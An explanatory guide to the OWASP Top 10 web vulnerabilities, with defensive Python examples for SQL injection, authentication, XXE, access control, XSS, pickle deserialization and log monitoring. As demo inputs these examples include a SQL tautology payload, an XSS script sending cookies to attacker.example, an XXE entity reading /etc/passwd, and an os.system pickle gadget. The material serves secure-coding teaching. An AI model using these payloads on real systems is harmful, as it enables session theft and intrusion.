First, injection (most commonly SQL injection)
Principle: violates the "separation of data and code" principle. Attacker-supplied input is spliced into a SQL statement, so the interpreter executes the attacker's text as part of the statement and the attacker obtains sensitive data.
(Common injection types include ordinary SQL injection, sqlmap's --os-shell (turning an injection into an operating-system shell), LDAP (Lightweight Directory Access Protocol) injection, XPath (XML Path Language, a language for locating parts of an XML document; XML is a subset of SGML, the Standard Generalized Markup Language) injection, and HQL injection.)
Conditions: the data is not filtered or validated before it reaches the interpreter.
Hazard:
Injection can cause data loss or corruption, loss of auditability, or denial of service. An injection vulnerability can sometimes lead to a complete takeover of the host.
Defense:
1. Use safe APIs: avoid handing raw strings to the interpreter, and use precompiled (parameterized) statements.
2. Escape characters that are special to the interpreter.
Example: LIKE '%M%' ESCAPE 'M'
The ESCAPE keyword defines "M" as the escape character; this tells the DBMS that the "%" following the "M" in the search pattern "%M%" is a literal percent sign, not a wildcard.
3. Whitelist input validation.
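The three defenses above, shown side by side with the bug, as an added example (Python with the standard-library sqlite3 module; this is not code from the original page). The table, its rows and the inputs are constructed for the demo; the LIKE escape character "M" is the one from the page's own example.

```python
import sqlite3


def make_db():
    """Constructed in-memory table for the example (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users (name, secret) VALUES (?, ?)",
                     [("alice", "s3cret-a"), ("bob", "s3cret-b"), ("50%off", "coupon")])
    return conn


def lookup_vulnerable(conn, name):
    """String splicing: the input is parsed as part of the statement.
    A name of  ' OR '1'='1  turns the WHERE clause into a tautology."""
    sql = "SELECT name FROM users WHERE name = '" + name + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, name):
    """Precompiled statement with a bound parameter: the input can only ever be a value."""
    sql = "SELECT name FROM users WHERE name = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (name,))]


LIKE_ESCAPE = "M"   # the escape character used in the page's LIKE ... ESCAPE 'M' example


def escape_like(term, esc=LIKE_ESCAPE):
    """Escape the LIKE metacharacters % and _ (and the escape character itself)
    so the user's term is matched literally inside a pattern."""
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_unescaped(conn, term):
    """Parameterized, so no injection, but a term of '%' still matches every row:
    binding stops code injection, it does not neutralise interpreter metacharacters."""
    sql = "SELECT name FROM users WHERE name LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def search_escaped(conn, term):
    """Bound parameter plus ESCAPE: '%' and '_' in the term are matched literally."""
    sql = "SELECT name FROM users WHERE name LIKE ? ESCAPE 'M' ORDER BY id"
    pattern = "%" + escape_like(term) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, "' OR '1'='1"))   # every row
    print("safe:      ", lookup_safe(db, "' OR '1'='1"))         # no row
    print("LIKE '%':  ", search_unescaped(db, "%"), search_escaped(db, "%"))
```

The whitelist defense is the third leg: where the value has a known shape (an integer id, a fixed set of column names for ORDER BY, which cannot be bound as a parameter), validate it against that shape before it goes anywhere near the statement.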
Second, broken authentication
Principle: weak passwords, password disclosure, brute force, passwords stored or transmitted in plaintext.
Hazard:
These vulnerabilities can lead to some or all accounts being compromised; once the attack succeeds, the attacker can perform any action the legitimate user could.
Defense:
1. Use multi-factor authentication.
2. Do not use default (weak) passwords.
3. Add a token (a random session token issued after login).
4. Protect stored credentials: salted password hashing rather than plaintext (reversible encryption is not a substitute for hashing).
5. A single entry point for authentication, so every login goes through the same checks.
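Defenses 2 to 5 in working form, as an added example (Python standard library only; not code from the original page). The password denylist, the iteration count, the lockout threshold and the UserStore class are constructed for the demo; a real deployment would check a breached-password list and persist the records.

```python
import hashlib
import hmac
import os
import secrets

# Constructed denylist for the example; a real deployment checks a large breached-password list.
DEFAULT_PASSWORDS = {"admin", "password", "123456", "root", "welcome", "changeme"}
ITERATIONS = 100_000      # PBKDF2 work factor (assumed); tune so one hash costs ~100 ms
MAX_FAILURES = 5          # lock the account after this many consecutive failures (assumed)


def is_weak_password(password):
    return len(password) < 12 or password.lower() in DEFAULT_PASSWORDS


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; the stored string carries its own parameters."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    _, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison: the check must not leak how many bytes matched.
    return hmac.compare_digest(digest.hex(), digest_hex)


class UserStore:
    """Single entry point: every login passes through login() and nothing else."""

    def __init__(self):
        self.users = {}      # name -> {"hash", "failures", "locked"}
        self.sessions = {}   # random session token -> name
        self._dummy = hash_password(secrets.token_hex(16))   # used to equalise timing

    def register(self, name, password):
        if is_weak_password(password):
            raise ValueError("weak or default password rejected")
        self.users[name] = {"hash": hash_password(password), "failures": 0, "locked": False}

    def login(self, name, password):
        """Return a session token on success, None otherwise.
        The caller is never told whether the user or the password was wrong."""
        user = self.users.get(name)
        if user is None:
            verify_password(password, self._dummy)   # same cost as a real check
            return None
        if user["locked"]:
            return None
        if not verify_password(password, user["hash"]):
            user["failures"] += 1
            if user["failures"] >= MAX_FAILURES:
                user["locked"] = True                 # brute-force stop
            return None
        user["failures"] = 0
        token = secrets.token_urlsafe(32)             # the "token" from defense 3
        self.sessions[token] = name
        return token
```

Multi-factor authentication (defense 1) sits on top of this: a successful password check would return a half-authenticated state rather than a session token until the second factor is verified.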
Third, sensitive data exposure
Principle: man-in-the-middle attacks, data handled in plaintext.
Methods: e.g., capturing and modifying requests with Burp Suite.
Defense:
1. Encrypt all sensitive data at rest.
2. Ensure data is encrypted in transit (e.g., use HTTPS).
3. Use standard, well-vetted cryptographic algorithms rather than home-grown ones.
Fourth, XML external entity (XXE)
Principle: the attacker uploads an XML document, or adds malicious content (an external entity declaration) to an XML document, and the server-side parser resolves it.
Defense:
1. Use the simplest possible data format (such as JSON) and avoid serializing sensitive data.
2. Server-side whitelist input validation and filtering, so malicious data never reaches the parser.
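Defense 2 applied to a concrete XML upload, as an added example (Python with the standard-library xml.etree parser; not code from the original page). The check a practitioner wants first is to refuse any document that declares a DTD, because that is where the external entity lives; the most direct fix is to turn off DTD processing in the parser, and the pre-parse rejection below is the fallback for parsers that do not expose that switch. The sample documents, the parse_order function and the SKU format are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample documents for the example (not from the original page).
BENIGN = b"<?xml version='1.0'?><order><item sku='A1' qty='2'/></order>"
XXE = (b"<?xml version='1.0'?>"
       b"<!DOCTYPE order [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
       b"<order><item sku='&xxe;' qty='1'/></order>")

# Any DTD is refused outright; it is the only place an entity can be declared.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)
# Whitelist for the one free-text field we consume (assumed format).
SKU_RE = re.compile(r"^[A-Z0-9-]{1,16}$")


class RejectedXML(ValueError):
    pass


def parse_order(data: bytes):
    """Return [(sku, qty), ...] or raise RejectedXML."""
    # 1. Reject before parsing: the parser must never see an entity declaration.
    if DOCTYPE_RE.search(data):
        raise RejectedXML("DTD / entity declaration not allowed")
    root = ET.fromstring(data)
    if root.tag != "order":
        raise RejectedXML("unexpected root element %r" % root.tag)
    # 2. Whitelist validation of every value the application actually uses.
    items = []
    for item in root.findall("item"):
        sku = item.get("sku", "")
        qty = item.get("qty", "")
        if not SKU_RE.match(sku) or not qty.isdigit():
            raise RejectedXML("bad item %r" % (sku,))
        items.append((sku, int(qty)))
    return items


def try_parse_order(data: bytes):
    """Convenience wrapper: the parsed items, or None if the document was rejected."""
    try:
        return parse_order(data)
    except (RejectedXML, ET.ParseError):
        return None


if __name__ == "__main__":
    print(try_parse_order(BENIGN))   # [('A1', 2)]
    print(try_parse_order(XXE))      # None
```

The byte-level DOCTYPE check assumes UTF-8 input; a document in UTF-16 would slip past it, which is why disabling DTD processing in the parser itself remains the primary defense and this check is a belt-and-braces filter.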
Fifth, broken access control
Principle: bypassing access control to obtain permissions the user should not have and escalate privileges.
Defense:
1. Role-based access control, denying by default.
2. Apply least privilege.
3. Log failed access-control checks and alert the appropriate administrator.
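All three defenses in one deny-by-default check, as an added example (Python; not code from the original page). It also covers the object-level case the role check alone misses: a user reading another user's record by changing the id. The roles, permissions, invoice records, the alert threshold and the AccessControl class are constructed for the demo.

```python
import logging
from collections import Counter

# Constructed roles, permissions and records for the example (not from the original page).
ROLE_PERMISSIONS = {
    "viewer": {"invoice:read"},
    "clerk":  {"invoice:read", "invoice:create"},
    "admin":  {"invoice:read", "invoice:create", "invoice:delete", "user:manage"},
}
INVOICES = {101: {"owner": "alice", "total": 40}, 102: {"owner": "bob", "total": 99}}
ALERT_THRESHOLD = 3   # failed checks by one user before the administrator is alerted (assumed)


class AccessDenied(PermissionError):
    pass


class AccessControl:
    def __init__(self):
        self.log = logging.getLogger("authz")
        self.failures = Counter()   # user -> failed checks
        self.alerts = []            # stands in for e-mail / pager to the administrator

    def check(self, user, role, permission, invoice_id=None):
        """Deny by default. The role must hold the permission (RBAC), and for an
        operation on a record the caller must own that record unless they are admin
        (least privilege: a viewer sees only their own invoices)."""
        allowed = permission in ROLE_PERMISSIONS.get(role, set())
        if allowed and invoice_id is not None:
            record = INVOICES.get(invoice_id)
            if record is None:
                allowed = False
            elif role != "admin":
                allowed = record["owner"] == user
        if not allowed:
            self.failures[user] += 1
            self.log.warning("access denied user=%s role=%s perm=%s object=%s",
                             user, role, permission, invoice_id)
            if self.failures[user] == ALERT_THRESHOLD:
                self.alerts.append("user %s: %d failed access checks"
                                   % (user, ALERT_THRESHOLD))
            raise AccessDenied("%s on %s" % (permission, invoice_id))


def read_invoice(ac, user, role, invoice_id):
    ac.check(user, role, "invoice:read", invoice_id)
    return INVOICES[invoice_id]["total"]


def try_read(ac, user, role, invoice_id):
    """The invoice total, or None when the check denies it."""
    try:
        return read_invoice(ac, user, role, invoice_id)
    except AccessDenied:
        return None


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    ac = AccessControl()
    print(try_read(ac, "alice", "viewer", 101))   # 40
    print(try_read(ac, "alice", "viewer", 102))   # None: not her invoice
```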
Sixth, security misconfiguration
Principle: unpatched vulnerabilities, default accounts, pages no longer in use, unprotected files and directories, etc. give an attacker unauthorized access to, or knowledge of, the system.
Security misconfiguration can occur at any level of the application stack, including the platform, web servers, application servers, databases, frameworks and custom code. The attacker uses default accounts, unused pages, unpatched vulnerabilities, unprotected files and directories, etc. to gain unauthorized access to the system.
Hazard:
The system can be fully compromised without anyone noticing, and user data may be stolen or tampered with at any time; in the worst case the entire system is destroyed.
Defense:
1. Build a minimal platform: do not include any unnecessary features, components, documentation, samples, etc.
2. Install updates and patches promptly.
3. Perform vulnerability scanning and security audits.
Seventh, cross-site scripting (XSS)
Principle: tampering with a web page by inserting a malicious script, so that when a user browses the page the attacker controls the user's browser.
Cross-site scripting is the most common web application security vulnerability. When an application includes user-supplied data in a page sent to the browser without proper validation and escaping, the result is cross-site scripting.
Types: reflected, stored, DOM-based.
Hazards: theft of the session or account (the cookie), and a variety of other attacks, such as using malicious software to hijack the user's browser.
Defense:
1. Set the HttpOnly flag on the session cookie so script cannot read it; this limits cookie hijacking via XSS but does not stop the XSS itself.
2. Input validation: filter or encode special characters.
3. Output encoding (ensures that characters in the input are treated as data rather than parsed as HTML by the browser).
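The reflected case with and without output encoding, plus the cookie flags from defense 1, as an added example (Python standard library; not code from the original page). The attacker payload, the page fragments and the session-id format are constructed for the demo.

```python
import html
import re

# Constructed attacker payload: exfiltrates the cookie to a host the attacker controls.
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def render_vulnerable(name):
    """Reflects user input into the page unencoded: the browser parses it as HTML."""
    return "<p>Hello, " + name + "</p>"


def render_safe(name):
    """Output encoding for an HTML text context: & < > \" ' become entities,
    so whatever the user typed stays data."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_attribute(value):
    """Attribute context: the value is quoted AND the quote character is escaped,
    otherwise  \" onfocus=\"alert(1)  would close the attribute and add a handler."""
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


SESSION_ID_RE = re.compile(r"[A-Za-z0-9_-]{16,128}")   # assumed token format


def session_cookie_header(session_id):
    """HttpOnly keeps the cookie out of document.cookie, Secure keeps it off plain HTTP,
    SameSite limits cross-site sending. The id is validated first so a CR/LF in it
    cannot inject a second header. Returns None for an invalid id."""
    if not SESSION_ID_RE.fullmatch(session_id):
        return None
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % session_id


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # script tag lands in the page intact
    print(render_safe(PAYLOAD))         # &lt;script&gt;... shown as text
```

Output encoding is context-specific: the HTML-text and attribute encoders above are not sufficient for data placed inside a script block, a URL, or a CSS value, each of which needs its own encoder.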
Eighth, insecure deserialization
Principle: deserialization restores an object from a byte stream or text format read from memory, a file, a database, or network communication; if that input is attacker-controlled, the attacker chooses which objects are created and what code runs while they are built.
Defense:
1. Enforce an integrity check (a signature) on serialized objects, and encrypt them where needed, to prevent tampering and the creation of malicious objects.
2. Strictly restrict the types that may be deserialized, before deserialization takes place.
3. Isolate the deserialization code so it runs in a low-privilege environment.
4. Monitor the deserialization process.
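Defenses 1 and 2 in working form around Python's pickle, as an added example (standard library only; not code from the original page). The Order class, the Exploit gadget, the shared key and the signing layout are constructed for the demo; the gadget is the usual __reduce__ trick and is only ever built, never loaded unrestricted.

```python
import hashlib
import hmac
import io
import pickle

KEY = b"constructed-demo-key-replace-in-production"   # assumed shared secret


class Order:
    """The one application type we are willing to reconstruct."""

    def __init__(self, sku, qty):
        self.sku, self.qty = sku, qty

    def __eq__(self, other):
        return isinstance(other, Order) and (self.sku, self.qty) == (other.sku, other.qty)


class Exploit:
    """Constructed gadget: a pickle of this object calls os.system on load."""

    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))


def sign(payload: bytes) -> bytes:
    """Defense 1: prepend an HMAC-SHA256 tag so tampering is detected before loading."""
    return hmac.new(KEY, payload, hashlib.sha256).digest() + payload


def verify(blob: bytes) -> bytes:
    tag, payload = blob[:32], blob[32:]
    expected = hmac.new(KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature: rejected before any deserialization")
    return payload


class RestrictedUnpickler(pickle.Unpickler):
    """Defense 2: every global lookup other than Order is refused, so a gadget that
    points at os.system (or anything else) is never resolved, let alone called."""

    def find_class(self, module, name):
        if module == Order.__module__ and name == "Order":
            return Order
        raise pickle.UnpicklingError("forbidden type %s.%s" % (module, name))


def pack(obj) -> bytes:
    """Sending side: serialize, then sign."""
    return sign(pickle.dumps(obj))


def safe_load(blob: bytes):
    """Receiving side: integrity first, then type-restricted loading."""
    payload = verify(blob)
    return RestrictedUnpickler(io.BytesIO(payload)).load()


def classify_load(blob: bytes):
    """'ok', 'bad_signature' or 'forbidden_type'; useful for monitoring (defense 4)."""
    try:
        safe_load(blob)
        return "ok"
    except ValueError:
        return "bad_signature"
    except pickle.UnpicklingError:
        return "forbidden_type"


if __name__ == "__main__":
    print(classify_load(pack(Order("A1", 2))))    # ok
    print(classify_load(pack(Exploit())))        # forbidden_type, nothing executed
```

Note the order: the signature is checked on the raw bytes before the unpickler ever runs, because pickle executes callables while parsing, and the allowlist is a second, independent gate for the case where the key leaks.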
Ninth, using components with known vulnerabilities
Principle: components with known vulnerabilities are easy targets for an attacker.
Defense:
1. Build a minimal platform.
2. Track CVE, CNVD and similar vulnerability feeds continuously.
3. Use a signature mechanism to verify the components you install.
Tenth, insufficient logging and monitoring
Principle: administrators do not pay attention to the logs, sensitive events are not recorded, and suspicious events are not monitored.
Defense:
1. Ensure all sensitive events are logged.
2. Establish an effective monitoring mechanism.
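Defense 2 run over the kind of record defense 1 produces, as an added example (Python standard library; not code from the original page). The log lines, their format, the failure threshold and the window are constructed for the demo; the detection is a sliding-window count of failed logins per source address, with a second alert when a source that was brute-forcing then succeeds.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample authentication log (not from the original page).
LOG_LINES = """\
2024-05-01T10:00:01Z auth user=alice src=10.0.0.5 result=FAIL
2024-05-01T10:00:03Z auth user=alice src=10.0.0.5 result=FAIL
2024-05-01T10:00:05Z auth user=admin src=10.0.0.5 result=FAIL
2024-05-01T10:00:07Z auth user=root src=10.0.0.5 result=FAIL
2024-05-01T10:00:09Z auth user=bob src=10.0.0.9 result=FAIL
2024-05-01T10:00:11Z auth user=alice src=10.0.0.5 result=FAIL
2024-05-01T10:00:15Z auth user=alice src=10.0.0.5 result=OK
2024-05-01T10:00:20Z auth user=bob src=10.0.0.9 result=OK
""".splitlines()

LINE_RE = re.compile(r"^(?P<ts>\S+) auth user=(?P<user>\S+) src=(?P<src>\S+) "
                     r"result=(?P<result>\S+)$")


def parse_line(line):
    """One log line -> dict with a datetime, or None for lines in another format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Return a list of alert dicts.
    'brute_force': a source reached `threshold` failures inside `window`.
    'success_after_bruteforce': that source then logged in successfully, which is
    the event an administrator most needs to see (a password was probably found)."""
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = failures[ev["src"]]
        while q and ev["ts"] - q[0] > window:   # drop failures outside the window
            q.popleft()
        if ev["result"] == "FAIL":
            q.append(ev["ts"])
            if len(q) == threshold:             # fire once, when the threshold is crossed
                alerts.append({"kind": "brute_force", "src": ev["src"],
                               "count": len(q), "ts": ev["ts"]})
        else:
            if len(q) >= threshold:
                alerts.append({"kind": "success_after_bruteforce", "src": ev["src"],
                               "user": ev["user"], "ts": ev["ts"]})
            q.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(LOG_LINES):
        print(alert)
```

The point of the example is what the log has to contain for the detection to be possible at all: a timestamp, the outcome, the account and the source address on every authentication attempt, failures included. Logging only successes would leave nothing to count.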